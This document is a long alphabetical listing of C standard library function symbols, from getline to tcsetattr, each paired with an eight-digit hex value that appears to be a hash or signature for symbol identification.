[?] getline 07FE2D98

[?] getline 559C1FB1

[?] getline_info 4DF96C22

[?] getlogin 20281632

[?] getlong F20F8D33

[?] getmntent 01DFD9CB

[?] getnetbyaddr C550FC74

[?] getnetbyname 6FC6ADC1

[?] getnetent C11AC8E2

[?] getnetgrent 4A78E6AD

[?] getnetname D17F7E89

[?] getopt 2C0A8B0A

[?] getopt_clean_environment EC1A7AD0

[?] getopt_internal E1EF58B9

[?] getopt_long A4C3373E

[?] getopt_long_only 98E20616

[?] getpagesize 665B7FE4

[?] getpagesize F1E6957E

[?] getpass 0FB53685

[?] getpeername 93D3112B

[?] getpgid 3A96FC55

[?] getpgrp 1AB597D7

[?] getpid 1F1670D4

[?] getpid 76D8AF69

[?] getppid 0E992C7F

[?] getpriority 7E427B12

[?] getprotobyname 6FC6ADC1

[?] getprotobynumber F4D36054

[?] getprotoent C11AC8E2

[?] getpublickey 49775AA9

[?] getpw B2B1E3D9

[?] getpwent 311E599A

[?] getpwnam B3A22EA8

[?] getpwuid 962E082E

[?] getrlimit FD26661D

[?] getrpcbyname 9D55CFC7

[?] getrpcbynumber 0B9E2ED9

[?] getrpcent D285D22C

[?] getrpcport D54825FD

[?] getrusage A7098107

[?] gets 6EEFB569

[?] getsecretkey 69CE4D97

[?] getservbyname 6FC6ADC1

[?] getservbyport C550FC74

[?] getservent F4843CCB

[?] getsgent F9D49195

[?] getsgnam C70A781D

[?] getshort D0B481BF

[?] getsid BAB7855A

[?] getsockname 93D3112B

[?] getsockopt CA0F7AED

[?] getspent F9D49195

[?] getspnam C70A781D

[?] gettimeofday 77C808E9

[?] getuid 43ECF148

[?] getuid 92707E2F

[?] getusershell 5B3D1CBD

[?] getutent 3A9FE5DD

[?] getutid 0B48673A

[?] getutline 0B48673A

[?] getw B839A3AB

[?] getwd 40D9E024

[?] glob 8F3D1710

[?] globfree 8B17A47A

[?] gmtime CB50791D

[?] gmtime_r 99F3DF3E

[?] group_in_compile_stack E321C103

[?] group_match_null_string_p B47F47A7

[?] group_number 38A83906

[?] group_number 82CB215B

[?] grpalloc 39DAB3B0

[?] grpopen 8BDCD52B

[?] grpread 02FBBF31

[?] gsignal AB1C507A

[?] gsignal C816D63D

[?] guess_category_value 59EEF84B

[?] guess_grouping 2987AFE8

[?] h_errno_location DB424743

[?] hack_digit.360 A7649745

[?] hasmntopt FBF4EF49

[?] hcreate 7BBE29AA

[?] hdestroy 4F1A3067

[?] heap_trim D0847527

[?] helper_overflow 6A384EFC

[?] herror EFD7BA32

[?] host2netname 8CF7432A

[?] hostalias D71A6E5E

[?] hsearch E40A7F7F

[?] htonl 2930938A

[?] htons 656F6472

[?] idle 9C070006

[?] ignore 81510F5C

[?] index 1CF2A0E6

[?] index 45FFE914

[?] inet_addr A341591B

[?] inet_aton 0A9278F5

[?] inet_lnaof 14623585

[?] inet_makeaddr C04F11F5

[?] inet_netof A29F41AB

[?] inet_network EBC13027

[?] inet_nsap_addr 3E88C8CA

[?] inet_nsap_ntoa 6BE08FE6

[?] inet_ntoa 0430DD5B

[?] init 19C79BA6

[?] init 1F614C30

[?] init 82C32E04

[?] init CD7FD9F8

[?] init_brk 8E30DDCE

[?] init_des 6EB9A47C

[?] init_dummy E9C5925B

[?] init_marker D7E4A654

[?] init_marker F032B495

[?] init_misc 2EA263EC

[?] initgroups 6409C308

[?] initstate 2FE3C069

[?] innetgr FEFF8081

[?] insert_op1 0135F3D9

[?] insert_op2 F6D83437

[?] insque 172D160E

[?] internal_flockfile 3457B1A1

[?] internal_ftrylockfile 4F9FD79A

[?] internal_funlockfile 5FC622C0

[?] ioctl CC4B9A96

[?] ioctl D7603A1F

[?] ioperm DD96FFCA

[?] iopl 4FB2CAF4

[?] ipc 7AF2EA95

[?] isalnum 7FF2F3AE

[?] isalpha 49C6FBF9

[?] isascii 514DFC21

[?] isatty 14A20C88

[?] isatty 5C362736

[?] isblank EBF7F2BC

[?] iscntrl 49C6FBF9

[?] isdigit 49C6FBF9

[?] isgraph B095F5CE

[?] isinf 1E6FF022

[?] isinf 723A6975

[?] isinfl 23BB2B20

[?] isinfl F6A68D94

[?] islower 49C6FBF9

[?] isnan AEA35027

[?] isnan BA45B0EA

[?] isnanl 00C88D19

[?] isnanl D5286937

[?] isprint 49C6FBF9

[?] ispunct 49C6FBF9

[?] isspace 49C6FBF9

[?] isupper 1A1AB9CE

[?] iswctype EFC13451

[?] isxdigit 49C6FBF9

[?] itoa 6A0F35D9

[?] itoa 6F0B92B5

[?] jrand48 F549596F

[?] key_decryptsession D3229C87

[?] key_encryptsession D3229C87

[?] key_gendes C4556A18

[?] key_setsecret A53E4F9B

[?] kill 975983C9

[?] kill 9C77AE0E

[?] killpg 5BC63481

[?] known_compare CE0EF4CD

[?] labs 2514A984

[?] lckpwdf AECE6517

[?] lcong48 C30239D9

[?] ldexp 7C961F77

[?] ldiv F5C1F3F1

[?] least_marker CE3BB52E

[?] lfind 1E9751C9

[?] libc_access D6049D62

[?] libc_acct 45902424

[?] libc_adjtimex A5FEB7CD

[?] libc_alarm E43431A9

[?] libc_calloc 0064DCF9

[?] libc_calloc DABBD265

[?] libc_chdir 20F1D1E3

[?] libc_chmod 773CF41B

[?] libc_chown F77775A3

[?] libc_chroot 19DB9673

[?] libc_close 1C96E7CE

[?] libc_close A9037B65

[?] libc_closedir 603886EA

[?] libc_creat 816304AD

[?] libc_dup AF646EB0

[?] libc_dup2 B7E96D35

[?] libc_execve B0440C36

[?] libc_fchdir 596FEDF5

[?] libc_fchmod D64DEC1A

[?] libc_fchown EFFE063B

[?] libc_fcntl 696A42B5

[?] libc_fcntl B20B75E5

[?] libc_fdatasync 8727D003

[?] libc_fork BCF79788

[?] libc_free 02F6C7D0

[?] libc_free 1B06F80E

[?] libc_fstatfs 4AF4D8FF

[?] libc_fsync 305A99DC

[?] libc_ftruncate 5D7584ED

[?] libc_getdents 8D636B73

[?] libc_getegid 41913271

[?] libc_geteuid 5527EA2B

[?] libc_getgid 783FF115

[?] libc_getgroups BADE5BEE

[?] libc_getitimer F80782E5

[?] libc_getpgid 3A96FC55

[?] libc_getpgrp 1AB597D7

[?] libc_getpid 76D8AF69

[?] libc_getppid 0E992C7F

[?] libc_getrlimit FD26661D

[?] libc_getrusage A7098107

[?] libc_getsid BAB7855A

[?] libc_gettimeofday 77C808E9

[?] libc_getuid 43ECF148

[?] libc_idle 9C070006

[?] libc_init 0DBBB4D1

[?] libc_init 9C89C698

[?] libc_init_first CD7FD9F8

[?] libc_init_secure 7133837D

[?] libc_ioctl CC4B9A96

[?] libc_ioperm DD96FFCA

[?] libc_iopl 4FB2CAF4

[?] libc_ipc 7AF2EA95

[?] libc_kill 975983C9

[?] libc_link 47E5E377

[?] libc_longjmp DA01258F

[?] libc_lseek 41C566DB

[?] libc_lseek 8CF2800B

[?] libc_lseek64 475ACE93

[?] libc_mallinfo 1C54E281

[?] libc_mallinfo CAB5C866

[?] libc_malloc AAFC256F

[?] libc_malloc FB496E0D

[?] libc_mallopt 2D805F6C

[?] libc_mallopt 49B2D05A

[?] libc_memalign 82301FE3

[?] libc_memalign D41EDAD7

[?] libc_mkdir 01319BB9

[?] libc_mlock B83A7CB3

[?] libc_mlockall EA3475E7

[?] libc_mount BA3F2BFA

[?] libc_mprotect 29D0C690

[?] libc_mremap DC88EC56

[?] libc_msync 836E5936

[?] libc_munlock 53BBC51A

[?] libc_munlockall F331ABF9

[?] libc_munmap 3103283A

[?] libc_nanosleep 2180E058

[?] libc_nice 033E38A7

[?] libc_nls_init 7CA86695

[?] libc_open 683D0574

[?] libc_open 71E8F5C1

[?] libc_open64 A84A27ED

[?] libc_opendir 816D8CD3

[?] libc_pause 6FB62DCC

[?] libc_pipe 421E971F

[?] libc_prev_fstat E593BEF1

[?] libc_prev_lstat 879FB8DA

[?] libc_prev_mknod 86B33BE7

[?] libc_prev_stat EF74D123

[?] libc_prev_ustat E9615692

[?] libc_pvalloc 433AF7F0

[?] libc_read 033E5507

[?] libc_read 7F7EF483

[?] libc_readdir 22996585

[?] libc_readdir_r 669E016A

[?] libc_readlink DF9FD359

[?] libc_realloc 1ED8BEDB

[?] libc_realloc 6C25D11E

[?] libc_reboot 4E7F6D8E

[?] libc_rename C71D40B1

[?] libc_rewinddir 71C8BBED

[?] libc_rmdir 0FAD8200

[?] libc_sched_get_priority_max C0891EDE

[?] libc_sched_get_priority_min BEF58F1D

[?] libc_sched_getparam 72F54683

[?] libc_sched_getscheduler 106F92A7

[?] libc_sched_rr_get_interval E35805BD

[?] libc_sched_setparam A57DD6B5

[?] libc_sched_setscheduler A2F3B88D

[?] libc_sched_yield 3319E564

[?] libc_seekdir 71C8BBED

[?] libc_setdomainname 486AEFD6

[?] libc_setfsgid DB8D0783

[?] libc_setfsuid 8FC790F6

[?] libc_setgid 49D0E9CE

[?] libc_setgroups 2A53E5E1

[?] libc_sethostname 954E2117

[?] libc_setitimer 403DD251

[?] libc_setpgid 70FFBE94

[?] libc_setpriority 2215388C

[?] libc_setregid AE82DD07

[?] libc_setreuid 74A59DEB

[?] libc_setrlimit C724C8F4

[?] libc_setsid DD587118

[?] libc_settimeofday 8E0A648B

[?] libc_setuid 62706B6D

[?] libc_siglongjmp DA01258F

[?] libc_sigpending F44566D0

[?] libc_sigprocmask 55EF7871

[?] libc_socketcall 8B172DD3

[?] libc_start_main 43D682FB

[?] libc_statfs CFE902B7

[?] libc_stime 1E29CA01

[?] libc_swapoff F174A4F1

[?] libc_swapon A521F0E6

[?] libc_symlink 8E1BC62F

[?] libc_sync 0179F61E

[?] libc_syscall_flock F2DBE9F9

[?] libc_syscall_readv 8DEC47E7

[?] libc_syscall_writev A7CD6533

[?] libc_sysinfo 1FB7832A

[?] libc_telldir F0B13165

[?] libc_time 58B72F00

[?] libc_times E2BC36E1

[?] libc_truncate 053AA91B

[?] libc_umask 91FAD98C

[?] libc_umount D84A5F91

[?] libc_uname 3506DCE6

[?] libc_unlink 55ED4980

[?] libc_uselib DC0C57F0

[?] libc_utime 203FFC30

[?] libc_valloc 6BDBFF34

[?] libc_valloc EFE021B2

[?] libc_vhangup E51F863F

[?] libc_vm86 97AD7E81

[?] libc_wait4 D7A31154

[?] libc_write D9229CA5

[?] libc_write F76BB4B4

[?] link 47E5E377

[?] link_in 578D99A4

[?] link_in D14AE427

[?] listen B5F28613

[?] llseek 475ACE93

[?] llseek 5C717BF9

[?] localeconv 15AF983C

[?] localtime 70BDF232

[?] localtime_r 99F3DF3E

[?] lockf 890365E8

[?] longjmp 1CC33058

[?] longjmp 2239EED8

[?] longjmp 4CE29451

[?] longjmp DA01258F

[?] longjmp_unwind E9C5925B

[?] lose D0CC3DE1

[?] lrand48 CB3B5D25

[?] lsearch EC0E2443

[?] lseek 41C566DB

[?] lseek 8CF2800B

[?] lseek64 475ACE93

[?] lstat 879FB8DA

[?] lxstat 2CE87F61

[?] lxstat 4197980B

[?] main 67F18345

[?] main_trim 52B2B586

[?] mallinfo 1C54E281

[?] mallinfo CAB5C866

[?] malloc AAFC256F

[?] malloc FB496E0D

[?] malloc_atfork 3B6AEB27

[?] malloc_check 2F314334

[?] malloc_check_init AD6D7D02

[?] malloc_get_state 297A3D93

[?] malloc_hook_ini C9B97EA8

[?] malloc_set_state 2DF87E6F

[?] malloc_starter 302DA2FA

[?] malloc_stats 0A1ABFC0

[?] malloc_stats 66A5EAA2

[?] malloc_trim 0B97D7F5

[?] malloc_trim F4E11B6B

[?] malloc_usable_size 37D3A777

[?] malloc_usable_size CF712559

[?] mallopt 2D805F6C

[?] mallopt 49B2D05A

[?] marker_delta E3B97CCC

[?] marker_delta FE756672

[?] marker_difference 5CE1B560

[?] marker_difference FF2C5B6B

[?] masksig_restore 1448EECF

[?] match_symbol B1AB8897

[?] mblen 925CD45A

[?] mbrlen AADCFB00

[?] mbrtowc 97C33DA3

[?] mbsinit D71076CE

[?] mbstowcs F6BFC1D5

[?] mbtowc 6547328E

[?] mem2chunk_check 17EE61E0

[?] memalign 82301FE3

[?] memalign D41EDAD7

[?] memalign_check 7CF37C0C

[?] memalign_hook_ini B88E2387

[?] memccpy 084AC7EB

[?] memchr 10A0B2F5

[?] memchr 27AD3901

[?] memcmp 3A44BC50

[?] memcpy 326903E6

[?] memcpy 7D39F1CB

[?] memfrob 08807EE7

[?] memmem 17771008

[?] memmove 0C88B8DB

[?] memmove 3FD1279E

[?] mempcpy 03651892

[?] memset 369B404F

[?] memset 4E05FA21

[?] mkdir 01319BB9

[?] mkfifo 7F44AEF6

[?] mknod 86B33BE7

[?] mkstemp 9DB930A4

[?] mktemp 72568BF7

[?] mktime 7D4CAEC3

[?] mlock B83A7CB3

[?] mlockall EA3475E7

[?] mmap 03296F2D

[?] mmap 9BFFD811

[?] modf 31C7D8A5

[?] mount BA3F2BFA

[?] mpn_add_n 618AE777

[?] mpn_add_n F4A6C9A4

[?] mpn_addmul_1 8A34610C

[?] mpn_addmul_1 8AF64A3F

[?] mpn_cmp 6C777E75

[?] mpn_cmp D2119DDB

[?] mpn_construct_double 7BF5B974

[?] mpn_construct_float E90FF214

[?] mpn_construct_long_double 65E91DC7

[?] mpn_divmod 7AB74E6E

[?] mpn_divmod_1 57EA95E2

[?] mpn_divrem EC37C419

[?] mpn_extract_double 2B18C414

[?] mpn_extract_double 3A0F2B51

[?] mpn_extract_long_double 20D28B66

[?] mpn_extract_long_double 84FF8010

[?] mpn_impn_mul_n 6FAF6806

[?] mpn_impn_mul_n_basecase ED7506C6

[?] mpn_impn_sqr_n 691E64A0

[?] mpn_impn_sqr_n_basecase 0A938363

[?] mpn_lshift 25EB0928

[?] mpn_lshift FB319D76

[?] mpn_mul 14401586

[?] mpn_mul 8CFF30F8

[?] mpn_mul_1 8A34610C

[?] mpn_mul_1 8AF64A3F

[?] mpn_mul_n BE73AFF3

[?] mpn_mul_n CED9C81D

[?] mpn_rshift 4FAF65B9

[?] mpn_rshift FB7ADB4A

[?] mpn_sub_n 618AE777

[?] mpn_sub_n F4A6C9A4

[?] mpn_submul_1 8A34610C

[?] mpn_submul_1 8AF64A3F

[?] mprotect 29D0C690

[?] mprotect CED4F387

[?] mrand48 12BF30B3

[?] mremap CD506CF8

[?] mremap DC88EC56

[?] msgctl 3C0570AD

[?] msgget 6BCF6A4B

[?] msgrcv A8E2CE74

[?] msgsnd 543EA962

[?] msort_with_tmp 9B649401

[?] msync 836E5936

[?] munlock 53BBC51A

[?] munlockall F331ABF9

[?] munmap 3103283A

[?] munmap E87ABB6D

[?] nanosleep 2180E058

[?] netname2host 69CE4D97

[?] netname2user 0EA9FFF1

[?] new_do_write 4BD7AFB0

[?] new_do_write 95115997

[?] new_exitfn CD631F64

[?] new_exitfn EA2E28D1

[?] new_fclose E0276F84

[?] new_file_attach 18C65482

[?] new_file_close_it E05F081A

[?] new_file_finish 6E20BCBB

[?] new_file_fopen A3FE84FD

[?] new_file_init 4527F6C3

[?] new_file_overflow 3B25FD89

[?] new_file_seekoff 5084A6B3

[?] new_file_setbuf 52F442A4

[?] new_file_sync 56278A25

[?] new_file_underflow 478E92C2

[?] new_file_write 0954B342

[?] new_file_xsputn BCFB0861

[?] new_fopen 7E082C7A

[?] new_heap A3A4B82D

[?] nice 033E38A7

[?] nis_alloc_pwd_args FAA388AA

[?] nis_clear_pwd_args 6E1DC5F2

[?] nis_copy_pwd_args DA1F6483

[?] nis_getgrent E59C7BD3

[?] nis_getgrnam 417F6507

[?] nis_getpwnam 987E04D0

[?] nis_parsegroupdata BB17B82D

[?] nis_parsepwddata AC132D07

[?] nl_expand_alias 17527C99

[?] nl_explode_name E86D3EEB

[?] nl_find_domain F82EBEF1

[?] nl_find_language 72B92140

[?] nl_find_locale 95A652EB

[?] nl_free_locale C96D8E46

[?] nl_get_alt_digit 9A8DA939

[?] nl_get_era_entry 071E1083

[?] nl_langinfo 2DFF212B

[?] nl_load_domain A40D76E8

[?] nl_load_locale 440F7473

[?] nl_load_locale AFA70C50

[?] nl_make_l10nflist 65F99518

[?] nl_normalize_codeset 3D97D9D1

[?] nl_postload_collate 396C15AE

[?] nl_postload_ctype 0D2AA034

[?] nl_postload_ctype E206F703

[?] nl_postload_time C5151368

[?] nl_remove_locale 25A52EE9

[?] nl_unload_domain B00F2C0C

[?] nl_unload_locale 84E6C2C6

[?] nobackup_pbackfail DD9D998D

[?] non_dynamic_init 02A5C211

[?] normal 26B3256A

[?] normal_errno_location DB424743

[?] normal_h_errno_location DB424743

[?] nrand48 F549596F

[?] ntohl 2930938A

[?] ntohs 656F6472

[?] ntp_gettime 2BF8E4CF

[?] obstack_allocated_p 8ABEF588

[?] obstack_begin 1EC1CAC0

[?] obstack_begin_1 BDC552E6

[?] obstack_free EF16EBE5

[?] obstack_newchunk 25DE55D6

[?] old_readdir_r F52114ED

[?] on_exit 19ABCFE2

[?] open 683D0574

[?] open 71E8F5C1

[?] open64 A84A27ED

[?] open_path 54D126DA

[?] openaux 86A991B6

[?] openchild 68549BE8

[?] opendir 49EEF334

[?] opendir 816D8CD3

[?] openlog 2FDB0444

[?] overflow 31305B8C

[?] overflow 955B1848

[?] p_cdname 6C5E1F33

[?] p_cdnname 01E05EDB

[?] p_class C34724BE

[?] p_fqname A0CB43A2

[?] p_option D64238B8

[?] p_query 19B0CF11

[?] p_rr 979204D2

[?] p_time 9CF6EA48

[?] p_type D85A7045

[?] padn EED836CB

[?] padn F4B2BDBC

[?] parse_printf_format 430D05C3

[?] passwd2des C1322046

[?] pathconf 07B12686

[?] pause 6FB62DCC

[?] pclose 01074F7E

[?] perror 98B42393

[?] personality 37771DF8

[?] pipe 421E971F

[?] pmap_getmaps EF68E72E

[?] pmap_getport 54790C88

[?] pmap_rmtcall 0BC8B79A

[?] pmap_set 22F9928D

[?] pmap_unset 3A8242D4

[?] popen D33D856B

[?] prev_fstat E593BEF1

[?] prev_lstat 879FB8DA

[?] prev_mknod 86B33BE7

[?] prev_stat EF74D123

[?] prev_ustat E9615692

[?] print_search_path 27043A3F

[?] printf 9D6614E2

[?] printf_fp 05B5A87F

[?] printf_fp B1A1107D

[?] printf_fphex 27BCB0D3

[?] printf_unknown 65C85285

[?] proc_close 427A16B8

[?] proc_open A361BD31

[?] profil 5609254A

[?] profil_counter 1E8A3199

[?] profile_fixup 669B783E

[?] profile_frequency DEDE8F9E

[?] psignal 5974FA74

[?] pthread_cond_signal E55DF312

[?] pthread_cond_wait E55DF312

[?] pthread_mutex_lock E55DF312

[?] pthread_mutex_unlock E55DF312

[?] pthread_once 979F3783

[?] pthread_success E55DF312

[?] pthread_void 979F3783

[?] pthread_yield 979F3783

[?] ptmalloc_init 7C6A6795

[?] ptmalloc_init_all DFDB8288

[?] ptmalloc_lock_all 3101952B

[?] ptmalloc_unlock_all DFDB8288

[?] ptrace 9A70A061

[?] putc 7998C996

[?] putchar 5CDA9654

[?] putenv 7DC7C4C3

[?] putlong B1774DB7

[?] putpwent 8AA0AC99

[?] puts D88A636D

[?] putsgent 7C6DE926

[?] putshort 29D39C77

[?] putspent 68069514

[?] pututline 498A5ACD

[?] pututline 550F850C

[?] putw 583FAB2B

[?] pvalloc 433AF7F0

[?] pwdalloc 7E81D731

[?] pwdopen 8BDCD52B

[?] pwdread 511FDAC5

[?] qsort BD84A60E

[?] qsort DB427733

[?] quicksort B9A42C70

[?] quicksort D4D1E8AC

[?] raise AB1C507A

[?] raise C816D63D

[?] rand A8AE92EE

[?] random E7FA7D93

[?] rawmemchr 9C0209A7

[?] rcmd BB0F125C

[?] re_comp 3AAD0020

[?] re_comp 3F387A7A

[?] re_compile_fastmap AF4D93C6

[?] re_compile_fastmap B615E6C3

[?] re_compile_pattern 09E27490

[?] re_compile_pattern 8C5136EF

[?] re_exec 1F984CC5

[?] re_exec F4ACC58F

[?] re_match 1814F514

[?] re_match B56FF6FE

[?] re_match_2 4AA93D41

[?] re_match_2 4D68113E

[?] re_match_2_internal 5DF359B3

[?] re_rx_search 5E7EC56D

[?] re_search DB05D29A

[?] re_search F45539A8

[?] re_search_2 64A1A0F4

[?] re_search_2 D4A69A16

[?] re_set_registers 5ED3FD8C

[?] re_set_registers C6DFD1AB

[?] re_set_syntax 48735A84

[?] re_set_syntax CBB22A6C

[?] read 033E5507

[?] read 7F7EF483

[?] read_alias_file 216C2AE7

[?] read_conf_file 8256C0A3

[?] readdir 22996585

[?] readdir A539BC4E

[?] readdir_r 669E016A

[?] readlink 103D1450

[?] readlink DF9FD359

[?] readv E174A192

[?] realloc 1ED8BEDB

[?] realloc 6C25D11E

[?] realloc_check 24F9C142

[?] realloc_hook_ini C519C451

[?] realpath 958C1C05

[?] realpath DDD8AB11

[?] reboot 4E7F6D8E

[?] recv 16E2ECD3

[?] recvfrom F380E122

[?] recvmsg 93D3112B

[?] regcomp B1EB2B6F

[?] regcomp F17CAA2B

[?] regerror 40A9C7C1

[?] regerror CE9470BD

[?] regex_compile 65B8504C

[?] regexec 0B6A9CF2

[?] regexec 4EE67514

[?] regfree 28EC6398

[?] regfree D578948A

[?] register_printf_function 757A7726

[?] register_printf_function 8FA6EDE1

[?] registerrpc 21B8D009

[?] remove 55ED4980

[?] remove_marker 4494C523

[?] remove_marker 7B624450

[?] remque 95C5A2A0

[?] rename C71D40B1

[?] res_close 7D568AF4

[?] res_init BBDA720D

[?] res_isourserver 45CE0DF0

[?] res_mkquery BD5CC8D7

[?] res_nameinquery 5EFD4E52

[?] res_queriesmatch 6736B356

[?] res_query C111875D

[?] res_querydomain A947F786

[?] res_randomid 79948C9D

[?] res_search 18C85831

[?] res_send D856E4CE

[?] res_send_setqhook 7886EE68

[?] res_send_setrhook 2C4BC99E

[?] res_status_location 26B3256A

[?] rewind 872D8AE7

[?] rewinddir 71C8BBED

[?] rexec A2563C81

[?] rindex 760EB382

[?] rindex DB9A955F

[?] rmdir 0FAD8200

[?] rpc_dtablesize 189CFC5F

[?] rresvport 9AB5E921

[?] rtime 6FC7AE33

[?] ruserok F2519AC0

[?] ruserpass 35C83A7D

[?] save_for_backup 6DFBC2DC

[?] sbrk 67A4E8A9

[?] sbrk A0159D9B

[?] scandir D79BA31E

[?] scanf B83CB1CE

[?] sched_get_priority_max C0891EDE

[?] sched_get_priority_min BEF58F1D

[?] sched_getparam 72F54683

[?] sched_getscheduler 106F92A7

[?] sched_rr_get_interval E35805BD

[?] sched_setparam A57DD6B5

[?] sched_setscheduler A2F3B88D

[?] sched_yield 3319E564

[?] secure_getenv 732247DC

[?] seed48 FC79639F

[?] seekdir 71C8BBED

[?] seekmark 0340A5BE

[?] seekmark 6791829E

[?] seekoff 84FAD1E5

[?] seekpos 6BC66B9B

[?] select 2D600FB4

[?] semctl 3F2FD73F

[?] semget 66E7B5C1

[?] semop 796B3B54

[?] send 16E2ECD3

[?] sendmsg 93D3112B

[?] sendto F380E122

[?] set_column 0E26EDF2

[?] set_progname 680A3094

[?] setb 10705905

[?] setb B9C49610

[?] setbuf 8F766134

[?] setbuffer AF6B5EBA

[?] setdomainname 486AEFD6

[?] setegid 979804A2

[?] setenv CF7AE9FA

[?] seterr_reply 3EBD1A60

[?] seteuid 1341C35E

[?] setfileno 10A269BB

[?] setfpucw 168E4F1E

[?] setfpucw 3B60D674

[?] setfsgid DB8D0783

[?] setfsuid 8FC790F6

[?] setgid 49D0E9CE

[?] setgrent 9465E8A7

[?] setgroups 2A53E5E1

[?] sethostent 67A30403

[?] sethostfile 0D274199

[?] sethostid FC01E0E1

[?] sethostname 954E2117

[?] sethtent 865561A8

[?] setitimer 403DD251

[?] setitimer C832A288

[?] setjmp 2886F424

[?] setjmp 3A87839D

[?] setjmp 743F112E

[?] setjmp F4362AFA

[?] setkey B05185D4

[?] setlinebuf 1B6FC4BB

[?] setlocale 08D6DF05

[?] setlocale 69CCDBD4

[?] setlogmask 9DF3D94A

[?] setmntent A4F8A71C

[?] setnetent 5BBE5123

[?] setnetgrent 760C2D73

[?] setpgid 70FFBE94

[?] setpgrp 24D53069

[?] setpriority 2215388C

[?] setprotoent 5BBE5123

[?] setpwent 315A6D45

[?] setregid AE82DD07

[?] setreuid 74A59DEB

[?] setrlimit C724C8F4

[?] setrpcent 7CB0B190

[?] setservent 5BBE5123

[?] setsgent 178F2683

[?] setsid DD587118

[?] setsockopt CA0F7AED

[?] setspent 178F2683

[?] setstate 4209DDB7

[?] settimeofday 8E0A648B

[?] setuid 62706B6D

[?] setusershell 9FE63630

[?] setutent F4D0A0CA

[?] setvbuf C57C70E4

[?] sgetn 9CAD905E

[?] sgetn B10B2AEC

[?] sgetsgent 04E2B7D9

[?] sgetspent 05D80336

[?] shmat 677219EA

[?] shmctl 6510089E

[?] shmdt 0276A47F

[?] shmget 7097D003

[?] shutdown 2082367C

[?] sig_restore 1D2148B4

[?] sigaction 8E78107B

[?] sigaction 9BA176E5

[?] sigaddset CCAEE268

[?] sigblock 9FCAE24C

[?] sigdelset CCAEE268

[?] sigemptyset 77C8153D

[?] sigfillset 1891EA90

[?] sigfillset 7D18F6E0

[?] siggetmask D5308B39

[?] siginterrupt F51761E0

[?] sigismember 6C8695E1

[?] sigjmp_save 5C37C503

[?] sigjmp_save DE561E54

[?] siglongjmp 4CE29451

[?] siglongjmp DA01258F

[?] signal 8AE66F9A

[?] sigpause 92E2C3E1

[?] sigpending F44566D0

[?] sigprocmask 55EF7871

[?] sigprocmask 72476DBA

[?] sigsetjmp C311393F

[?] sigsetmask 8A519643

[?] sigsuspend 6116998A

[?] sleep 892E25C7

[?] snprintf 4BC4782B

[?] socket 93D3112B

[?] socketcall 8B172DD3

[?] socketpair 16E2ECD3

[?] sprintf F2B20976

[?] sputbackc 8BA608B0

[?] sputbackc FEA707C5

[?] srand 2E5E6C81

[?] srand48 5485DC76

[?] srandom 2E5E6C81

[?] sscanf F2B20976

[?] ssignal 8AE66F9A

[?] stat EF74D123

[?] statfs CFE902B7

[?] stime 1E29CA01

[?] store_op1 23733CE6

[?] store_op2 8F1DAD19

[?] stpcpy E885FB3E

[?] stpcpy FB8A10B7

[?] stpncpy 17588FE0

[?] stpncpy 87A555D1

[?] str_count D0895E40

[?] str_finish 4585CAFF

[?] str_init_readonly EE4FE970

[?] str_init_static 896B1FD9

[?] str_overflow 91A404C8

[?] str_pbackfail A9E6ADB6

[?] str_seekoff 166C8644

[?] str_underflow 8D2904C6

[?] strcasecmp 264852B2

[?] strcasecmp 633DE1BE

[?] strcat 4DC57DD1

[?] strchr 1CF2A0E6

[?] strchr 45FFE914

[?] strcmp 02FE6D4A

[?] strcmp 1871BDD8

[?] strcoll A09399E4

[?] strcoll BB49322F

[?] strcpy 32D87F9D

[?] strcpy 8BCF0D0E

[?] strcspn 1C9A1F74

[?] strcspn 7DFF647B

[?] strdup 9C321016

[?] strdup C13691A3

[?] strerror 19B0CF11

[?] strerror_internal 9F12B3F8

[?] strerror_r 5603CD6D

[?] strfry 6B4AD668

[?] strftime CBCAE650

[?] strlen 8C70DBBF

[?] strncasecmp CDC72536

[?] strncat DB692065

[?] strncmp 12D5F199

[?] strncmp A5AB5D81

[?] strncpy 0A7C5829

[?] strncpy C639F2C2

[?] strndup E8AE2D2F

[?] strpbrk 1C9A1F74

[?] strpbrk B5505CCB

[?] strptime 35BB5081

[?] strrchr 760EB382

[?] strrchr DB9A955F

[?] strsep A598B16B

[?] strsignal 1BAAE47E

[?] strspn E6D707D8

[?] strstr 95FF828C

[?] strstr 9DDECDAD

[?] strtod DEBCE0D0

[?] strtod_internal 3A17EE27

[?] strtof DEBCE0D0

[?] strtof_internal E20039D9

[?] strtok 005FC27C

[?] strtol 1FC2A193

[?] strtol 749D4A7C

[?] strtol_internal 1886DD5E

[?] strtol_internal 53012F4D

[?] strtold DEBCE0D0

[?] strtold_internal 40AFF0ED

[?] strtoq CE6FC82F

[?] strtoq_internal E48F91DF

[?] strtoul 1FC2A193

[?] strtoul_internal 1886DD5E

[?] strtouq CE6FC82F

[?] strtouq_internal E48F91DF

[?] strxfrm 173BA17C

[?] sungetc CC1F9194

[?] sungetc FBA2CBE9

[?] svc_exit E0ECA796

[?] svc_getreq BF9FCCC9

[?] svc_getreqset 6D5A4D7D

[?] svc_register CB2702B4

[?] svc_run 1421E43F

[?] svc_sendreply 80D15191

[?] svc_unregister A1543E1F

[?] svcauth_des FF43396B

[?] svcauth_null E55DF312

[?] svcauth_short 8D1E0E68

[?] svcauth_unix EDB743F7

[?] svcerr_auth 585F76CD

[?] svcerr_decode B493B026

[?] svcerr_noproc B493B026

[?] svcerr_noprog B493B026

[?] svcerr_progvers 90ADB6D7

[?] svcerr_systemerr B493B026

[?] svcerr_weakauth 824431E8

[?] svcfd_create 4C1E799D

[?] svcraw_create C18753D9

[?] svctcp_create 29035591

[?] svcudp_bufcreate 29035591

[?] svcudp_create AB771494

[?] svcudp_enablecache 121F33CC

[?] swab 3A4DD5F1

[?] swapoff F174A4F1

[?] swapon A521F0E6

[?] switch_to_backup_area 9194B961

[?] switch_to_backup_area B8FA5FA0

[?] switch_to_get_mode 569EF9B5

[?] switch_to_get_mode 94329164

[?] switch_to_main_get_area 8ABDC304

[?] switch_to_main_get_area 8FE8C626

[?] symlink 8E1BC62F

[?] sync 0179F61E

[?] sync E55DF312

[?] syscall 029282B4

[?] syscall_error D165F367

[?] syscall_flock F2DBE9F9

[?] syscall_readv 8DEC47E7

[?] syscall_writev A7CD6533

[?] sysconf F243F33E

[?] sysctl 57B6D328

[?] sysinfo 1FB7832A

[?] syslog F2B20976

[?] system E838C6F6

[?] tcdrain 3C724F2E

[?] tcflow 4FF0B88A

[?] tcflush 17ECA1BB

[?] tcgetattr 889B8DD3

[?] tcgetattr 9F537EA9

[?] tcgetpgrp 4C19ABA0

[?] tcsendbreak 83FC2829

[?] tcsetattr 34EA53DF

